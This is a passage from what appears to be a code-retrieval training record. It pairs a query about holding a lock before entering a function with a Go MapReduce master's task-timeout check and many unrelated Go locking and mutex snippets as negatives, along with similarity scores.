mod. hash.Hash.Write() never returns an error.\n\th.Write(key)\n\tbucket := int(h.Sum32())\n\tbucket &= len(l.locks) - 1\n\n\t//atomic.AddUint32(&l.counts[bucket], 1)\n\n\t//if (atomic.AddUint64(&numops, 1) % 10000) == 0 {\n\t//\tfor idx, count := range l.counts {\n\t//\t\tfmt.Printf(\"%d: %d\\n\", idx, count)\n\t//\t}\n\t//}\n\n\tif read {\n\t\treturn l.rlocks[bucket]\n\t}\n\n\treturn l.locks[bucket]\n}", "func (cb *cachedBatch) Lock() {\n\tcb.lock.Lock()\n}", "func (cb *cachedBatch) Lock() {\n\tcb.lock.Lock()\n}", "func updateGPSReading( update GPSReading ) {\n rw_mutex.Lock()\n gpsReading = update\n rw_mutex.Unlock()\n}", "func (fdl *FDLimiter) Lock() {\n\tfor {\n\t\tfdl.lk.Lock()\n\t\tif fdl.count < fdl.limit {\n\t\t\tfdl.count++\n\t\t\tfdl.notify()\n\t\t\tfdl.lk.Unlock()\n\t\t\treturn\n\t\t}\n\t\tfdl.lk.Unlock()\n\t\t<-fdl.ch\n\t}\n\tpanic(\"FDLimiter, unreachable\")\n}", "func (n Node) readLock(fn func() error) error {\n\tn.fs.μ.RLock()\n\tdefer n.fs.μ.RUnlock()\n\treturn fn()\n}", "func Unlock() {\n\t// TO DO\n}", "func (*dir) Lock(pid, locktype, flags int, start, length uint64, client string) error {\n\treturn nil\n}", "func internalAcquire(fm *filemutex.FileMutex) chan error {\n\tresult := make(chan error)\n\tgo func() {\n\t\tif err := fm.Lock(); err != nil {\n\t\t\tresult <- err\n\t\t}\n\t\tclose(result)\n\t}()\n\treturn result\n}", "func (sic *indexCache) lockEntry(name addr) {\n\tsic.cond.L.Lock()\n\tdefer sic.cond.L.Unlock()\n\n\tfor {\n\t\tif _, present := sic.locked[name]; !present {\n\t\t\tsic.locked[name] = struct{}{}\n\t\t\tbreak\n\t\t}\n\t\tsic.cond.Wait()\n\t}\n}", "func (s *server) loader_task() {\n\tfor {\n\t\tkey := <-s.wait\n\t\ts.Lock()\n\t\ts.dirty[key] = true\n\t\ts.Unlock()\n\t}\n}", "func (s *SharedState) unlock() {\n s.mutex.Unlock()\n}", "func (b *baseKVStoreBatch) Lock() {\n\tb.mutex.Lock()\n}", "func (b *baseKVStoreBatch) Lock() {\n\tb.mutex.Lock()\n}", "func (this *DeployLock) finish() {\n\tthis.mutex.Lock()\n\tthis.numFinished++\n\tthis.mutex.Unlock()\n}", "func (r GopassRepo) lockState(payload []byte) error { return nil }", "func (sm *ShardMaster) update() {\n\tvar noop Op\n\tnoop.ProposedConfig.Num = 0\n\t// Concatenate first 16 digits of current time with\n\t// first 3 digits of sm.me\n\t// Using 3 digits of sm.me allows for a thousand peers\n\t// Using 16 digits of the time means it won't repeat for about 115 days\n\t// Using both time and \"me\" means it's probably unique\n\t// Using 19 digits means it will fit in a uint64\n\ttimeDigits := uint64(time.Now().UnixNano() % 10000000000000000)\n\tmeDigits := uint64(sm.me % 1000)\n\tnoop.ID = timeDigits*1000 + meDigits\n\n\tupdated := false\n\tfor !updated && !sm.dead {\n\t\tsm.px.Start(sm.maxSequenceCommitted+1, noop)\n\t\t// Wait until its Status is decided\n\t\tdecided := false\n\t\tvar decidedValue interface{}\n\t\ttoWait := 25 * time.Millisecond\n\t\tfor !decided && !sm.dead {\n\t\t\tdecided, decidedValue = sm.px.Status(sm.maxSequenceCommitted + 1)\n\t\t\tif !decided {\n\t\t\t\ttime.Sleep(toWait)\n\t\t\t\t//if toWait < 2*time.Second {\n\t\t\t\t//\ttoWait *= 2\n\t\t\t\t//}\n\t\t\t}\n\t\t}\n\n\t\tif sm.dead {\n\t\t\tbreak\n\t\t}\n\n\t\t// Get the decided configuration for this sequence\n\t\tdecidedConfig := decidedValue.(Op).ProposedConfig\n\t\t// If the decided value has the chosen unique ID, ours was accepted and we are updated\n\t\t// Otherwise, store decided configuration (if it's not another no-op)\n\t\tif decidedValue.(Op).ID == noop.ID {\n\t\t\tupdated = true\n\t\t} else {\n\t\t\tif decidedConfig.Num > 0 {\n\t\t\t\tsm.addConfig(decidedConfig)\n\t\t\t}\n\t\t}\n\t\tsm.maxSequenceCommitted++\n\t}\n\tsm.px.Done(sm.maxSequenceCommitted)\n}", "func (px *Paxos) Done(seq int) {\n // Your code here.\n px.mu.Lock()\n defer px.mu.Unlock()\n\n px.decisions[px.me] = seq\n}", "func (d *dMutex) lock(i interface{}) {\n\n\t// acquire global lock\n\td.globalMutex.Lock()\n\n\t// if there is no cMutex for i, create it\n\tif _, ok := d.mutexes[i]; !ok {\n\t\td.mutexes[i] = new(cMutex)\n\t}\n\n\t// increase the count in order to show, that we are interested in this\n\t// instance mutex (thus now one deletes it)\n\td.mutexes[i].count++\n\n\t// remember the mutex for later\n\tmutex := &d.mutexes[i].mutex\n\n\t// as the cMutex is there, we have increased the count, and we know the\n\t// instance mutex, we can release the global lock\n\td.globalMutex.Unlock()\n\n\t// and wait on the instance mutex\n\t(*mutex).Lock()\n}", "func (am *AccountManager) Grab() {\n\t<-am.bsem\n}", "func (fs *flowControlFlowStats) lockForTokens() {\n\tfs.shared.mu.Lock()\n}", "func init() {\n\truntime.LockOSThread()\n}", "func init() {\n\truntime.LockOSThread()\n}", "func (n Node) writeLock(fn func() error) error {\n\tn.fs.μ.Lock()\n\tdefer n.fs.μ.Unlock()\n\treturn fn()\n}", "func (m *Metric) Lock() {\n\tif m.mapSync == nil {\n\t\treturn\n\t}\n\tm.mapSync.Lock()\n}", "func (tm *TabletManager) lock(ctx context.Context) error {\n\treturn tm.actionSema.Acquire(ctx, 1)\n}", "func (self *Map) unlock() {\n\tif self.atomic != nil {\n\t\tself.atomic.Unlock()\n\t}\n}", "func (p *Playlist) Lock() {\n\tlog.Debug(\"Locking playlist\")\n\tp.mu.Lock()\n}", "func gorAput() {\n\tfor n := range CA {\n\t\tif n == aToken {\n\t\t\tAB <- n\n\t\t\tfmt.Println(\"put to AB\")\n\t\t\tmutex.Lock()\n\t\t\tcount++\n\t\t\tmutex.Unlock()\n\t\t}\n\t}\n}", "func (t *TrudyPipe) Lock() {\n\tt.userMutex.Lock()\n}", "func (e *Enumerate) unlock() {\n\te.u.m.Unlock()\n}", "func (wt *Wallet) Lock() {\n\twt.lockRequests <- struct{}{}\n}", "func Unlock() {\n\tmutex.Unlock()\n}", "func (p *PhonebookAccess1Properties) Lock() {\n\tp.lock.Lock()\n}", "func (m *MutexSafe) unlock() {\n\tm.Mutex.Unlock()\n}", "func (x *XcChaincode) lock(stub shim.ChaincodeStubInterface, args []string) pb.Response {\n\tif len(args) < 3 {\n\t\treturn shim.Error(\"Params Error\")\n\t}\n\t//get operator\n\tsender, err := stub.GetSender()\n\tif err != nil {\n\t\treturn shim.Error(err.Error())\n\t} else if sender == \"\" {\n\t\treturn shim.Error(\"Account not exist\")\n\t}\n\ttoPlatform := strings.ToLower(args[0])\n\ttoAccount := strings.ToLower(args[1])\n\tamount := big.NewInt(0)\n\t_, ok := amount.SetString(args[2], 10)\n\tif !ok {\n\t\treturn shim.Error(\"Expecting integer value for amount\")\n\t}\n\n\t//try to get state from book which key is variable toPlatform's value\n\tplatState, err := stub.GetState(toPlatform)\n\tif err != nil {\n\t\treturn shim.Error(\"Failed to get platform: \" + err.Error())\n\t} else if platState == nil {\n\t\treturn shim.Error(\"The platform named \" + toPlatform + \" is not registered\")\n\t}\n\n\t//set txId to be key\n\tkey := stub.GetTxID()\n\t//do transfer\n\terr = stub.Transfer(x.tacTokenAddr, \"TAB\", amount)\n\tif err != nil {\n\t\treturn shim.Error(\"Transfer error \" + err.Error())\n\t}\n\ttxTimestamp, err := stub.GetTxTimestamp()\n\tif err != nil {\n\t\treturn shim.Error(err.Error())\n\t}\n\ttimeStr := fmt.Sprintf(\"%d\", txTimestamp.GetSeconds())\n\t//build turn out state\n\tstate := x.buildTurnOutMessage(sender, toPlatform, toAccount, amount, timeStr)\n\terr = stub.PutState(key, state)\n\tif err != nil {\n\t\treturn shim.Error(err.Error())\n\t}\n\t//build composite key\n\tindexName := \"type~address~datetime~platform~key\"\n\tindexKey, err := stub.CreateCompositeKey(indexName, []string{\"out\", sender, timeStr, x.platName, key})\n\tif err != nil {\n\t\treturn shim.Error(err.Error())\n\t}\n\tvalue := []byte{0x00}\n\tstub.PutState(indexKey, value)\n\n\t//sign\n\tsignJson, err := x.signJson([]byte(\"abc\"), \"60320b8a71bc314404ef7d194ad8cac0bee1e331\")\n\tif err != nil {\n\t\treturn shim.Error(err.Error())\n\t}\n\treturn shim.Success(signJson)\n}", "func (svr *Server) update(){\n\tmsg := svr.queue.Dequeue()\n\tif msg != nil {\n\t\t// fmt.Println(\"server receives msg with vec_clock: \", msg.Vec)\n\t\t// fmt.Println(\"server has vec_clock: \", svr.vec_clock)\n\t\tsvr.vec_clock_cond.L.Lock()\n\t\tfor svr.vec_clock[msg.Id] != msg.Vec[msg.Id]-1 || !smallerEqualExceptI(msg.Vec, svr.vec_clock, msg.Id) {\n\t\t\tsvr.vec_clock_cond.Wait()\n\t\t\tif svr.vec_clock[msg.Id] > msg.Vec[msg.Id]-1 {\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t\t// update timestamp and write to local memory\n\t\tsvr.vec_clock[msg.Id] = msg.Vec[msg.Id]\n\t\t// fmt.Println(\"server increments vec_clock: \", svr.vec_clock)\n\t\tsvr.vec_clock_cond.Broadcast()\n\t\tsvr.vec_clock_cond.L.Unlock()\n\t\tsvr.m_data_lock.Lock()\n\t\tsvr.m_data[msg.Key] = msg.Val\n\t\tsvr.m_data_lock.Unlock()\n\t}\n}", "func (kv *ShardKV) tick() {\n kv.mu.Lock()\n defer kv.mu.Unlock()\n if kv.cur_config.Num!=kv.next_config.Num{\n return\n }\n query_num := kv.cur_config.Num+1\n config := kv.sm.Query(query_num)\n if config.Num == query_num {\n\n if val,ok := kv.config_started[config.Num];ok&&val{\n return\n }else{\n kv.config_started[config.Num] = true\n /*\n if kv.unreliable{\n fmt.Print(\"GID:\")\n fmt.Println(kv.gid)\n fmt.Print(\"me: \")\n fmt.Println(kv.me)\n fmt.Print(\"Config num: \")\n fmt.Println(config.Num)\n fmt.Println()\n }*/\n kv.Config(config)\n return\n }\n\n }\n return\n}", "func (r *ResourceLock) init() bool {\n\tif r.listing == nil {\n\t\tr.masterLock.Lock()\n\t\tdefer r.masterLock.Unlock()\n\t\t// double check, per pattern\n\t\tif r.listing == nil {\n\t\t\tr.listing = make(map[interface{}]*sync.Mutex)\n\t\t}\n\t\treturn true\n\t}\n\treturn false\n}", "func (ms *Server) returnRequest(req *request) {\n\tms.reqMu.Lock()\n\tthis := req.inflightIndex\n\tlast := len(ms.reqInflight) - 1\n\n\tif last != this {\n\t\tms.reqInflight[this] = ms.reqInflight[last]\n\t\tms.reqInflight[this].inflightIndex = this\n\t}\n\tms.reqInflight = ms.reqInflight[:last]\n\tinterrupted := req.interrupted\n\tms.reqMu.Unlock()\n\n\tms.recordStats(req)\n\tif interrupted {\n\t\t// Don't reposses data, because someone might still\n\t\t// be looking at it\n\t\treturn\n\t}\n\n\tif req.bufferPoolOutputBuf != nil {\n\t\tms.buffers.FreeBuffer(req.bufferPoolOutputBuf)\n\t\treq.bufferPoolOutputBuf = nil\n\t}\n\n\treq.clear()\n\n\tif p := req.bufferPoolInputBuf; p != nil {\n\t\treq.bufferPoolInputBuf = nil\n\t\tms.readPool.Put(p)\n\t}\n\tms.reqPool.Put(req)\n}", "func (w *Wallet) Lock() {\n\tw.lockRequests <- struct{}{}\n}", "func Unlock() {\n\tlock.Unlock()\n}", "func (p *AdminPolicyStatus1Properties) Lock() {\n\tp.lock.Lock()\n}", "func (self *AccelGroup) Lock() {\n\tC.gtk_accel_group_lock(self.object)\n}", "func (l *Lock) Lock() {\n\tl.ch <- struct{}{}\n}", "func (s *SharedState) lock() *SharedState {\n s.mutex.Lock()\n return s\n}", "func (n *nsLockMap) lock(ctx context.Context, volume, path string, lockSource, opsID string, readLock bool, timeout time.Duration) (locked bool) {\n\tvar nsLk *nsLock\n\n\tn.lockMapMutex.Lock()\n\tparam := nsParam{volume, path}\n\tnsLk, found := n.lockMap[param]\n\tif !found {\n\t\tn.lockMap[param] = &nsLock{\n\t\t\tLRWMutex: lsync.NewLRWMutex(ctx),\n\t\t\tref: 1,\n\t\t}\n\t\tnsLk = n.lockMap[param]\n\t} else {\n\t\t// Update ref count here to avoid multiple races.\n\t\tnsLk.ref++\n\t}\n\tn.lockMapMutex.Unlock()\n\n\t// Locking here will block (until timeout).\n\tif readLock {\n\t\tlocked = nsLk.GetRLock(opsID, lockSource, timeout)\n\t} else {\n\t\tlocked = nsLk.GetLock(opsID, lockSource, timeout)\n\t}\n\n\tif !locked { // We failed to get the lock\n\n\t\t// Decrement ref count since we failed to get the lock\n\t\tn.lockMapMutex.Lock()\n\t\tnsLk.ref--\n\t\tif nsLk.ref == 0 {\n\t\t\t// Remove from the map if there are no more references.\n\t\t\tdelete(n.lockMap, param)\n\t\t}\n\t\tn.lockMapMutex.Unlock()\n\t}\n\treturn\n}", "func (mdl *Model) Lock() {\n\tmdl.locked = true\n}", "func (f *fragment) handleMutex(rowID, columnID uint64) error {\n\tif existingRowID, found, err := f.mutexVector.Get(columnID); err != nil {\n\t\treturn errors.Wrap(err, \"getting mutex vector data\")\n\t} else if found && existingRowID != rowID {\n\t\tif _, err := f.unprotectedClearBit(existingRowID, columnID); err != nil {\n\t\t\treturn errors.Wrap(err, \"clearing mutex value\")\n\t\t}\n\t}\n\treturn nil\n}", "func main() {\n\tvar memoryAccess sync.Mutex //1\n\tvar value int\n\tgo func() {\n\t\tmemoryAccess.Lock() //2\n\t\tvalue++\n\t\tmemoryAccess.Unlock() //3\n\t}()\n\n\tmemoryAccess.Lock() //4\n\tif value == 0 {\n\t\tfmt.Printf(\"the value is %v\\n\", value)\n\t} else {\n\t\tfmt.Printf(\"the value is %v\\n\", value)\n\t}\n\tmemoryAccess.Unlock() //5\n}", "func (r *RecordCache) Lock() {\n\tr.lock.Lock()\n}", "func (f *file) Lock() error {\n\treturn nil\n}", "func acquire_distributed_write_lock(n *net_node.Node, filename string) {\n\t// If we are currently writing the file,\n\t// block until the write is finished\n\tif file_in_filesystem(n, filename) {\n\t\tfor n.Files[filename].Writing || n.Files[filename].NumReading > 0 {\n\t\t\ttime.Sleep(10 * time.Millisecond)\n\t\t}\n\t\tn.Files[filename].Writing = true\n\t\t//fmt.Println(filename + \" Set Writing to true | acquire_distributed_write_lock fileinsystem\")\n\t} else {\n\t\t//fmt.Println(filename + \" not in system, add to local list\")\n\t\tn.Files[filename] = &pings.FileMetaDataProto{Writing: true, FileSize: 0}\n\t\t//fmt.Println(filename + \" Set Writing to true | acquire_distributed_write_lock filenotinsystem\")\n\t}\n\n\t// Notify the servers that we are writing a file\n\t// so that other writes/reads will not be able to proceed\n\tnotify_other_servers_of_file_write_start(n, filename)\n\n\t// Wait for the other servers to respond\n\t// for int(n.Files[filename].NumAckWriting) < net_node.NumActiveServ(n)-1 {\n\t// \tfmt.Println(filename + \" got \" + strconv.Itoa(int(n.Files[filename].NumAckWriting)) + \" acks\")\n\t// \tfmt.Println(\"numberactive serv is \" + strconv.Itoa(net_node.NumActiveServ(n)))\n\t// \tfmt.Println(\"waiting for all ackwriting\")\n\t// \ttime.Sleep(100 * time.Millisecond)\n\t// }\n\n\tn.Files[filename].NumAckWriting = 0\n}", "func MWAIT() { ctx.MWAIT() }", "func (p Pin) Lock() {\n\tp.Port().Lock(Pin0 << p.index())\n}", "func (rw *RWMutex) AssertHeld() {\n}", "func (s *Scheduler) lockService() {\n\ts.serviceLock.Lock()\n}", "func (e *neighborEntry) dispatchAddEventLocked() {\n\tif nudDisp := e.cache.nic.stack.nudDisp; nudDisp != nil {\n\t\tnudDisp.OnNeighborAdded(e.cache.nic.id, e.mu.neigh)\n\t}\n}", "func (txs *TxSerializer) lockLocked(ctx context.Context, key, table string) (bool, error) {\n\tq, ok := txs.queues[key]\n\tif !ok {\n\t\t// First transaction in the queue i.e. we don't wait and return immediately.\n\t\ttxs.queues[key] = newQueueForFirstTransaction(txs.concurrentTransactions)\n\t\ttxs.globalSize++\n\t\treturn false, nil\n\t}\n\n\tif txs.globalSize >= txs.maxGlobalQueueSize {\n\t\tif txs.dryRun {\n\t\t\ttxs.globalQueueExceededDryRun.Add(1)\n\t\t\ttxs.logGlobalQueueExceededDryRun.Warningf(\"Would have rejected BeginExecute RPC because there are too many queued transactions (%d >= %d)\", txs.globalSize, txs.maxGlobalQueueSize)\n\t\t} else {\n\t\t\ttxs.globalQueueExceeded.Add(1)\n\t\t\treturn false, vterrors.Errorf(vtrpcpb.Code_RESOURCE_EXHAUSTED,\n\t\t\t\t\"hot row protection: too many queued transactions (%d >= %d)\", txs.globalSize, txs.maxGlobalQueueSize)\n\t\t}\n\t}\n\n\tif q.size >= txs.maxQueueSize {\n\t\tif txs.dryRun {\n\t\t\ttxs.queueExceededDryRun.Add(table, 1)\n\t\t\tif txs.env.Config().SanitizeLogMessages {\n\t\t\t\ttxs.logQueueExceededDryRun.Warningf(\"Would have rejected BeginExecute RPC because there are too many queued transactions (%d >= %d) for the same row (table + WHERE clause: '%v')\", q.size, txs.maxQueueSize, txs.sanitizeKey(key))\n\t\t\t} else {\n\t\t\t\ttxs.logQueueExceededDryRun.Warningf(\"Would have rejected BeginExecute RPC because there are too many queued transactions (%d >= %d) for the same row (table + WHERE clause: '%v')\", q.size, txs.maxQueueSize, key)\n\t\t\t}\n\t\t} else {\n\t\t\ttxs.queueExceeded.Add(table, 1)\n\t\t\tif txs.env.Config().TerseErrors {\n\t\t\t\treturn false, vterrors.Errorf(vtrpcpb.Code_RESOURCE_EXHAUSTED,\n\t\t\t\t\t\"hot row protection: too many queued transactions (%d >= %d) for the same row (table + WHERE clause: '%v')\", q.size, txs.maxQueueSize, txs.sanitizeKey(key))\n\t\t\t}\n\t\t\treturn false, vterrors.Errorf(vtrpcpb.Code_RESOURCE_EXHAUSTED,\n\t\t\t\t\"hot row protection: too many queued transactions (%d >= %d) for the same row (table + WHERE clause: '%v')\", q.size, txs.maxQueueSize, key)\n\t\t}\n\t}\n\n\tif q.availableSlots == nil {\n\t\t// Hot row detected: A second, concurrent transaction is seen for the\n\t\t// first time.\n\n\t\t// As an optimization, we deferred the creation of the channel until now.\n\t\tq.availableSlots = make(chan struct{}, txs.concurrentTransactions)\n\t\tq.availableSlots <- struct{}{}\n\n\t\t// Include first transaction in the count at /debug/hotrows. (It was not\n\t\t// recorded on purpose because it did not wait.)\n\t\ttxs.Record(key)\n\t}\n\n\ttxs.globalSize++\n\tq.size++\n\tq.count++\n\tif q.size > q.max {\n\t\tq.max = q.size\n\t}\n\t// Publish the number of waits at /debug/hotrows.\n\ttxs.Record(key)\n\n\tif txs.dryRun {\n\t\ttxs.waitsDryRun.Add(table, 1)\n\t\tif txs.env.Config().SanitizeLogMessages {\n\t\t\ttxs.logWaitsDryRun.Warningf(\"Would have queued BeginExecute RPC for row (range): '%v' because another transaction to the same range is already in progress.\", txs.sanitizeKey(key))\n\t\t} else {\n\t\t\ttxs.logWaitsDryRun.Warningf(\"Would have queued BeginExecute RPC for row (range): '%v' because another transaction to the same range is already in progress.\", key)\n\t\t}\n\t\treturn false, nil\n\t}\n\n\t// Unlock before the wait and relock before returning because our caller\n\t// Wait() holds the lock and assumes it still has it.\n\ttxs.mu.Unlock()\n\tdefer txs.mu.Lock()\n\n\t// Non-blocking write attempt to get a slot.\n\tselect {\n\tcase q.availableSlots <- struct{}{}:\n\t\t// Return waited=false because a slot was immediately available.\n\t\treturn false, nil\n\tdefault:\n\t}\n\n\t// Blocking wait for the next available slot.\n\ttxs.waits.Add(table, 1)\n\tselect {\n\tcase q.availableSlots <- struct{}{}:\n\t\treturn true, nil\n\tcase <-ctx.Done():\n\t\treturn true, ctx.Err()\n\t}\n}", "func (this *UserService) MatterLock(userUuid string) {\n\n\tcacheItem, err := this.locker.Value(userUuid)\n\tif err != nil {\n\t\tthis.logger.Error(\"error while get cache\" + err.Error())\n\t}\n\n\tif cacheItem != nil && cacheItem.Data() != nil {\n\t\tpanic(result.BadRequest(\"file is being operating, retry later\"))\n\t}\n\n\tduration := 12 * time.Hour\n\tthis.locker.Add(userUuid, duration, true)\n}", "func process() *os.Process {\n lock.Lock()\n defer lock.Unlock()\n return proc\n}", "func (l *fingerprintLocker) Lock(fp model.Fingerprint) {\n\tl.fpMtxs[hashFP(fp)%l.numFpMtxs].Lock()\n}", "func (ac *AuthCache) synchronize() {\n\t// if none of our internal reflectors changed, then we can skip reviewing the cache\n\tskip, currentState := ac.skip.SkipSynchronize(ac.lastState, ac.lastSyncResourceVersioner, ac.policyLastSyncResourceVersioner)\n\tif skip {\n\t\treturn\n\t}\n\n\tuserSubjectRecordStore := ac.userSubjectRecordStore\n\tgroupSubjectRecordStore := ac.groupSubjectRecordStore\n\n\tresources, err := ac.syncResources()\n\tif err != nil {\n\t\tutilruntime.HandleError(err)\n\t\treturn\n\t}\n\tac.knownResources = resources\n\tac.synchronizeClusterRoleBindings(userSubjectRecordStore, groupSubjectRecordStore)\n\tac.lastState = currentState\n\tklog.V(2).Infoln(\"synchronize...\", ac.knownResources, ac.knownUsers, ac.knownGroups)\n}", "func (c *CycleState) Lock() {\n\tc.mx.Lock()\n}", "func (marketApp *MarketPlaceApp) LockUse() error {\n return marketApp.Lock(1)\n}" ]
[ "0.64919794", "0.6400804", "0.6357743", "0.61221063", "0.60903263", "0.6075487", "0.6074046", "0.5973512", "0.5962571", "0.593107", "0.5918071", "0.58903503", "0.5859525", "0.5784371", "0.5672075", "0.564242", "0.5573499", "0.55710864", "0.5566131", "0.5564282", "0.5564187", "0.5543807", "0.55110615", "0.5503832", "0.55025524", "0.54980356", "0.54894626", "0.54608816", "0.54579264", "0.5456225", "0.545057", "0.54462945", "0.5409487", "0.54083556", "0.54034406", "0.5396936", "0.53847617", "0.53808516", "0.53808516", "0.5377127", "0.5372975", "0.537107", "0.53395206", "0.5326622", "0.5325282", "0.53208673", "0.5309529", "0.53026533", "0.5298083", "0.5298083", "0.52908254", "0.5288763", "0.5283645", "0.5278267", "0.5276389", "0.5276025", "0.52734125", "0.52571064", "0.52571064", "0.5256547", "0.52512115", "0.525", "0.5243157", "0.5239828", "0.5239683", "0.5237821", "0.5236863", "0.5232325", "0.5229485", "0.52260166", "0.5213272", "0.52105653", "0.5209953", "0.52083886", "0.52047014", "0.5202504", "0.52002364", "0.5187927", "0.5186155", "0.5185205", "0.51838565", "0.51832145", "0.5181152", "0.5174191", "0.516615", "0.51530766", "0.51422024", "0.5140293", "0.5123431", "0.511704", "0.5111117", "0.5109508", "0.5104427", "0.51043737", "0.51041543", "0.51018023", "0.5090192", "0.5082017", "0.50795054", "0.5073535", "0.5072767" ]
0.0
-1
/ should hold lock before enter this func
func (m *Master) haveDone() bool { ret := true t := time.Now().Unix() j := 0 for j < len(m.reduceTasks) { if m.reduceTasks[j].state == 1 { if t-m.reduceTasks[j].emittime >= TIMEOUT { m.reduceTasks[j].state = 0 } } j++ } i := 0 for _, reduceTask := range m.reduceTasks { if reduceTask.state == 0 { m.nextreducetask = i break } i++ } for _, reduceTask := range m.reduceTasks { if reduceTask.state != 2 { ret = false break } } if ret { m.done = true } return ret }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (e *Enumerate) lock() {\n\te.u.m.Lock()\n}", "func (heap *SkewHeap) lock() { heap.mutex.Lock() }", "func (r *Radix) lock() {\n\tif r.ts {\n\t\tr.mu.Lock()\n\t}\n}", "func (q *RxQueue) lock() {\n\tq.pendingMutex.Lock()\n}", "func (self *Map) lock() {\n\tif self.atomic == nil {\n\t\tself.atomic = new(sync.Mutex)\n\t}\n\n\tself.atomic.Lock()\n}", "func (e *endpointMap) lock() func() {\n\te.mu.Lock()\n\treturn func() { e.mu.Unlock() }\n}", "func (m *MutexSafe) lock() {\n\tm.Mutex.Lock()\n}", "func (*Item) Lock() {}", "func (*NoCopy) Lock() {}", "func (*S) Lock() {}", "func (w *wlockMap) lock(ino uint64) {\n\tw.Lock()\n\tr := w.inodeLocks[ino]\n\tw.Unlock()\n\t// this can take a long time - execute outside the wlockMap lock\n\tr.Lock()\n}", "func Lock() {\n\tlock.Lock()\n}", "func (*noCopy) Lock() {}", "func Lock() {\n\tmutex.Lock()\n}", "func (this *DeployLock) start() {\n\tthis.mutex.Lock()\n\tthis.numStarted++\n\tthis.mutex.Unlock()\n}", "func SyncRuntimeDoSpin()", "func (p *Player) lock() {\n\tp.chLock <- struct{}{}\n}", "func (this *Peer) update() {\n\t// ping the peer\n\t// we do this outside the lock to avoid communication latency in the lock\n\tonline := this.protocol.ping(this.id)\n\n\tthis.mu.Lock()\n\tif online && this.status == STATUS_OFFLINE {\n\t\tLog.Info.Printf(\"Peer %s came online\", this.id.String())\n\t\tthis.status = STATUS_ONLINE\n\t} else if !online && this.status == STATUS_ONLINE {\n\t\tLog.Info.Printf(\"Peer %s went offline\", this.id.String())\n\t\tthis.status = STATUS_OFFLINE\n\t}\n\n\tverificationDelay := 300 * time.Second\n\tif Debug {\n\t\tverificationDelay = time.Second\n\t}\n\n\tvar randomShard *BlockShardId\n\tif time.Now().After(this.lastVerifyTime.Add(verificationDelay)) {\n\t\tthis.lastVerifyTime = time.Now()\n\n\t\t// pick a random shard to verify\n\t\tavailableShards := make([]BlockShardId, 0)\n\t\tfor shardId, available := range this.shardsAccounted {\n\t\t\tif available {\n\t\t\t\tavailableShards = append(availableShards, shardId)\n\t\t\t}\n\t\t}\n\n\t\tif len(availableShards) > 0 {\n\t\t\trandomShard = &availableShards[rand.Intn(len(availableShards))]\n\t\t}\n\t}\n\tthis.mu.Unlock()\n\n\tif randomShard != nil {\n\t\tLog.Debug.Printf(\"Verifying shard %d on peer %s\", *randomShard, this.id.String())\n\t\tbytes, success := this.retrieveShard(*randomShard)\n\n\t\tif !success || !this.fluidBackup.blockStore.VerifyShard(this, *randomShard, bytes) {\n\t\t\t// either we failed to communicate with the peer (if !success),\n\t\t\t// or the peer sent us corrupted shard data (if success)\n\t\t\tfailReason := \"invalid shard data\"\n\t\t\tif !success {\n\t\t\t\tfailReason = \"peer communication failed\"\n\t\t\t}\n\t\t\tLog.Info.Printf(\"Failed verification of shard %d on peer %s: %s\", *randomShard, this.id.String(), failReason)\n\n\t\t\tthis.mu.Lock()\n\t\t\tif success {\n\t\t\t\t// shard is invalid, delete from remote end\n\t\t\t\t// block store will re-assign it already from the verifyshard call, so don't need to do anything else about that\n\t\t\t\tdelete(this.shardsAccounted, *randomShard)\n\t\t\t\tgo this.deleteShard(*randomShard)\n\t\t\t}\n\n\t\t\t// we also check if this peer is failed per our one-day policy, in which case we would want to clear all accounted shards\n\t\t\tthis.verifyFailCount++\n\t\t\tif this.verifyFailCount > 5 && time.Now().After(this.lastVerifySuccessTime.Add(time.Second * VERIFY_FAIL_WAIT_INTERVAL)) {\n\t\t\t\tgo this.terminateAgreement()\n\t\t\t}\n\t\t\tthis.mu.Unlock()\n\n\t\t\t// Decrease trust\n\t\t\tthis.peerList.UpdateTrustPostVerification(this.id, false)\n\t\t} else {\n\t\t\tthis.peerList.UpdateTrustPostVerification(this.id, true)\n\n\t\t\tthis.mu.Lock()\n\t\t\tthis.verifyFailCount = 0\n\t\t\tthis.lastVerifySuccessTime = time.Now()\n\t\t\tthis.mu.Unlock()\n\t\t}\n\t}\n}", "func (d *Dam) Lock() {\n\td.freeze.Lock()\n}", "func initLockNames() {}", "func LockOSThread() {\n}", "func (v *SafeSet) Lock() {\n\tv.mu.Lock()\n}", "func (channelTree *ChannelTree) Lock() {\n\tchannelTree.mutex.Lock()\n}", "func (w *Writer) lock() error {\n\tw.mutex.Lock()\n\tif w.tar == nil {\n\t\tw.mutex.Unlock()\n\t\treturn errors.New(\"Internal error: trying to use an already closed tarfile.Writer\")\n\t}\n\treturn nil\n}", "func (pb *PBServer) tick() {\n pb.mu.Lock()\n // Your code here\n v := pb.view\n pb.view, _ = pb.vs.Ping(pb.view.Viewnum)\n if pb.view.Viewnum > v.Viewnum && pb.view.Backup != \"\" && pb.me == pb.view.Primary {\n// if v.Backup != pb.view.Backup && pb.view.Backup != \"\" && pb.me == pb.view.Primary {\n args := &CopyArgs{}\n reply := CopyReply{}\n args.KV = pb.kv\n args.Serials = pb.serials\n fmt.Printf(\"######%s copy database\\n\", pb.me)\n for true {\n ok := call(pb.view.Backup, \"PBServer.ForwardComplete\", args, &reply)\n if ok {\n break\n }\n }\n }\n pb.mu.Unlock()\n// DPrintf(\"tick! %s %d\\n\", pb.me, pb.view.Viewnum);\n}", "func (c *ChannelBucket) Lock() {\n\tc.mutex.Lock()\n}", "func (f *File) metaLock() {\n\tif f.up == nil {\n\t\tlogf(\"f.elem = %s\\n\", f.dir.elem)\n\t}\n\tassert(f.up != nil)\n\tf.up.lk.Lock()\n}", "func (c Mutex) Lock() {\n\t<-c.ch\n}", "func neighborEntryinitLockNames() {}", "func (h *schedulerHelper) lockCallBack() {\n\tglog.V(3).Infof(\"lockCallBack--Expired lock for pod[%s], parent[%s]\", h.podName, h.controllerName)\n\t// check whether need to do reset scheduler\n\tif !(h.flag) {\n\t\treturn\n\t}\n\n\t// check whether the scheduler has been changed.\n\tscheduler, err := h.getSchedulerName(h.client, h.nameSpace, h.controllerName)\n\tif err != nil || scheduler != h.schedulerNone {\n\t\treturn\n\t}\n\n\t// restore the original scheduler\n\tinterval := defaultUpdateSchedulerSleep\n\ttimeout := time.Duration(defaultRetryMore+1) * interval\n\tutil.RetryDuring(defaultRetryMore, timeout, interval, func() error 